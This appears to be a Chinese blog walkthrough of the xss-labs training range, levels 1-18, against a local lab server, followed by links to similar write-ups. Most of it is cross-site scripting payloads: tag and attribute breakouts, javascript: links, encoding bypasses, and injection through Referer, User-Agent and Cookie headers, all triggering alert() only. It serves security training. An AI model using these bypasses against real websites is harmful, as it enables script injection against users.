xss-lab 1-18

最新推荐文章于 2024-08-05 14:00:00 发布
最新推荐文章于 2024-08-05 14:00:00 发布
阅读量257 收藏
点赞数
分类专栏: 网络安全 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zaric_001/article/details/112384491
版权

level1
http://192.168.1.5/xss-labs/level1.php?name=%3Cscript%3Ealert(/xss/)%3C/script%3E
http://192.168.1.5/xss-labs/level1.php?name=<script>alert(/xss/)</script>

level2
http://192.168.1.5/xss-labs/level2.php?keyword=1%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://192.168.1.5/xss-labs/level2.php?keyword=1"><script>alert(/xss/)</script>

level3
http://192.168.1.5/xss-labs/level3.php?keyword=1ok%27%20οnclick=%27javascript:alert(/xss/)%27
http://192.168.1.5/xss-labs/level3.php?keyword=1ok' οnclick='javascript:alert(/xss/)'


level4
http://192.168.1.5/xss-labs/level4.php?keyword=1%22%20οnclick=%27alert(/xss/)%27&submit=%E6%90%9C%E7%B4%A2
http://192.168.1.5/xss-labs/level4.php?keyword=1" οnclick='alert(/xss/)'&submit=æç´¢

 

level5
http://192.168.1.5/xss-labs/level5.php?keyword=%22%3E%20%3Ca%20href=%22javascript:alert(/xss/)%22%3Elink%3C/a%3E&submit=%E6%90%9C%E7%B4%A2
http://192.168.1.5/xss-labs/level5.php?keyword="> <a href="javascript:alert(/xss/)">link</a>&submit=æç´¢

 

level6
http://192.168.1.5/xss-labs/level6.php?keyword=%22%3E%3Ca%20hrEf=%22javascript:alert(/xss/)%22%3Elink%3C/a%3E&submit=%E6%90%9C%E7%B4%A2
http://192.168.1.5/xss-labs/level6.php?keyword="><a hrEf="javascript:alert(/xss/)">link</a>&submit=æç´¢

 


level7
http://192.168.1.5/xss-labs/level7.php?keyword=sdasdsa%27%3E%22oonnclick=%22alert(/xss/)%22
http://192.168.1.5/xss-labs/level7.php?keyword=sdasdsa'>"oonnclick="alert(/xss/)"

 

 

level8
http://192.168.1.5/xss-labs/level8.php?keyword=javascri%26%23x70t%3Aalert%28%2Fxss%2F%29&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5

http://192.168.1.5/xss-labs/level8.php?keyword=javascri&#x70t:alert(/xss/)&submit=æ·»å åæé¾æ¥

 

level9
http://192.168.1.5/xss-labs/level9.php?keyword=javascri%26%23x70t%3Aalert%28%27xss%27%29%3B%2F%2Fhttp%3A%2F%2Fwww.baidu.com&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5
http://192.168.1.5/xss-labs/level9.php?keyword=javascri&#x70t:alert('xss');//http://www.baidu.com&submit=æ·»å åæé¾æ¥

 

level10
http://192.168.1.5/xss-labs/level10.php?keyword=%22%3Cscript%3E%3C/script%3E&t_sort=xcxc%22%20type=text%20οnclick=%22alert(/xss/)%22
http://192.168.1.5/xss-labs/level10.php?keyword="<script></script>&t_sort=xcxc" type=text οnclick="alert(/xss/)"


level11

GET /xss-labs/level11.php?keyword=zcxzcxzcxzcz&t_sort=cxzczczczcxc HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Referer: " type="text" οnclick="alert(/xss/)"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

修改Referer

 

 

level12
GET /xss-labs/level12.php?keyword=good%20job! HTTP/1.1
Host: 192.168.1.5
User-Agent: " type="text" οnclick="alert(/xss/)"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.5/xss-labs/level11.php?keyword=zcxzcxzcxzcz&t_sort=cxzczczczcxc
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

修改user-agent

level13
GET /xss-labs/level14.php HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.1.5/xss-labs/level13.php?keyword=good%20job!
Cookie: user=" type=text οnclick=javascript:alert(/xss/) '
Upgrade-Insecure-Requests: 1


修改cookie

level14
不好使

 

level15
通过查看源代码得知此处为ng-include,那么配合第一个关
192.168.1.5/xss-labs/level15.php?src='level1.php?name=<img src="xcxcxx" οnerrοr="javascript:alert(/xss/)"/>'

level16
空格绕过
http://192.168.1.5/xss-labs/level16.php?keyword=%3Cinput%0aοnclick=%22alert(%27xss%27)%22%3E
http://192.168.1.5/xss-labs/level16.php?keyword=%3Cinput%0cοnclick=%22alert(%27xss%27)%22%3E

level17

http://192.168.1.5/xss-labs/level17.php?arg01=a&arg02=b%20οnmοuseοver=alert(/xss/)

 


level18
http://192.168.1.5/xss-labs/level18.php?arg01=a&arg02=b οnclick=alert(/xss/)


level 19
搞不懂
arg01=version&arg02=<a href="javascript:alert(1)">123</a>
网上说需要反编译。。。


level20
搞不懂

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Jornici
关注
专栏目录
XSS-LabXSS注入教程)
DMXA的博客
11-01 530
解题思路:先观察题目的类型,猜哪个地方可以存在注入,代码分析这个可以交给chatgpt,下面就可以尝试自己构造好的payload 做了10题下来,发现难度是依次上升的解题思路:先观察题目的类型,猜哪个地方可以存在注入,然后是代码分析,这个可以交给chatgpt,下面就可以尝试自己构造好的payload,也可以进行BP抓包看下具体数据,或者指纹识别查一下框架是否有历史漏洞, XSS常用的标签:
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9345
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
Xss-labs(1)第一关到第十一关
m0_46412408的博客
09-25 758
Xss-labs靶场训练第一关:查看页面源代码回显playload长度:插入一段js代码,get传参,一个简单的插入顺利来到第二关,二话不说先直接尝试插入,并没有成功:查看页面源代码:特殊字符被实体转义了我们需要闭合掉双引号即可,构造payload,这一关是闭合绕过来到第三关,随便输入一个闭合弹窗试试,符号也被实体化了:查看php源码。
XSS-labs-master靶场:1-13关速通
最新发布
weixin_68416970的博客
08-05 477
XSS-labs-master靶场:1-13关快速通关教程;超详细!!!
20210205pentestLab1靶场XSS
qq_45290991的博客
02-05 601
Pentester中的XSS详解 </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_description" style="display: none"> <img src="...
XSS-Lab 1-15
震山的博客
08-25 333
个人 XSS-Lab 通关记录
xss-lab全通关教程
05-07
XSS-lab的20个关卡中,你将依次接触这些类型,并学习如何构造有效的XSS payload,以及如何利用各种过滤和转义机制来绕过防护。例如,你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器,当其他用户访问同一页面时,脚本将在用户的浏览器中执行。 2. **反射型XSS**:非持久性,恶意脚本通过URL参数传递,用户点击链接或者提交表单后,...
XSS-lab通关记录
zjnu_y3s的博客
04-11 2258
本文章为buuctf basic XSS-lab的通关记录,为个人学习记录,仅供参考 在学习xss-lab之前,先了解了一下xss攻击的原理,如下: 简述 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则.
XSS-Lab 1-10
qq_51558360的博客
03-21 327
不使用过滤器 name=<script>alert(1)</script> 闭合标签 输入第一题的答案,没有成功,查看源码,发现: 我们输入的数据,是在表单中的value属性内 法一: 所以需要先闭合input标签,然后在注入代码,闭合标签: "><script>alert(1)</script> 法二: 是闭合value属性,然后在input标签内加入事件属性: " οnclick="alert(11) 单引号闭合并添加事件 输入测试:
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
xss-labs
Yb_140的博客
03-26 1876
xss-labs下载地址:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台 目录 level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 level11 level12 level13 level14 level15 level16 level17 level18 level19 level20 level1 猜测使用GET传参,将name显示在
xss-lab(1-5)关卡笔记
Yoo_666的博客
07-12 570
文章目录(一)XSS(二)xss-lab(三)关卡笔记第一关第二关第三关第四关第五关 (一)XSS XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,xss漏洞大多数是寻找参数未过滤的输出函数。 (二)xss-lab 靶场下载地址 链接:https://pan.baidu.com
XSS靶场之xss-lab(1-5)关卡笔记
Yoo的博客
07-12 1568
文章目录(一)XSS(二)xss-lab(三)关卡笔记第一关第二关第三关第四关第五关 (一)XSS (XSS)跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,xss漏洞大多数是寻找参数未过滤的输出函数。 (二)xss-lab 靶场下载地址:https://github.com/lysha
XSS-labs 1-13关通关攻略
qq_57861415的博客
01-31 1695
xsslabs 1-13关攻略
XSS攻击-xss-lab(1-18)详细讲解
wrypot的博客
03-29 1968
发现单引号前面的内容被赋值给了value,也就是说单引号是value的闭合字符,构造语句开头一个单引号,后面加一个空格(input标签里面属性直接用空格隔开)所以我们接下来要做得事情是,首先&参数t_sort,然后用双引号闭合value值,接着将type类型从hidden隐藏改为text文本,再用onfocus事件触发js语句,最后别忘了,因为我们用双引号闭合了value,所以value本身有的一个双引号多出来了,我们在onfocus="javascript:alert(123)
XSS攻击-xss-lab(1-18)详细讲解_xsslab,2024年最新IDEA太强悍了
2401_84185182的博客
04-10 534
XSS攻击-xss-lab(1-18)详细讲解XSS_LAB XSS漏洞总结 (含做题思路和方法)
xss-labs靶场
newlife1441的博客
07-29 871
靶场搭建,可以从Github上下载或者直接下载下面的资源入门级别的xss-labs靶场,有需要的自行下载搭建,搭建过程可以参考网上的资料-网络安全文档类资源-CSDN下载入门级别的xss-labs靶场,适合新入门的学生进行练习,希望你可以从中学习到一些解题的相关技巧和关更多下载资源、学习资料请访问CSDN下载频道.https。......
XSS-Lab第十关
07-27
XSS-Lab的第十关是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一关都有不同的XSS注入漏洞。在第十关中,与上一关不同的是会加入地址的检查。具体来说,该关会检查输入的数据中是否...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值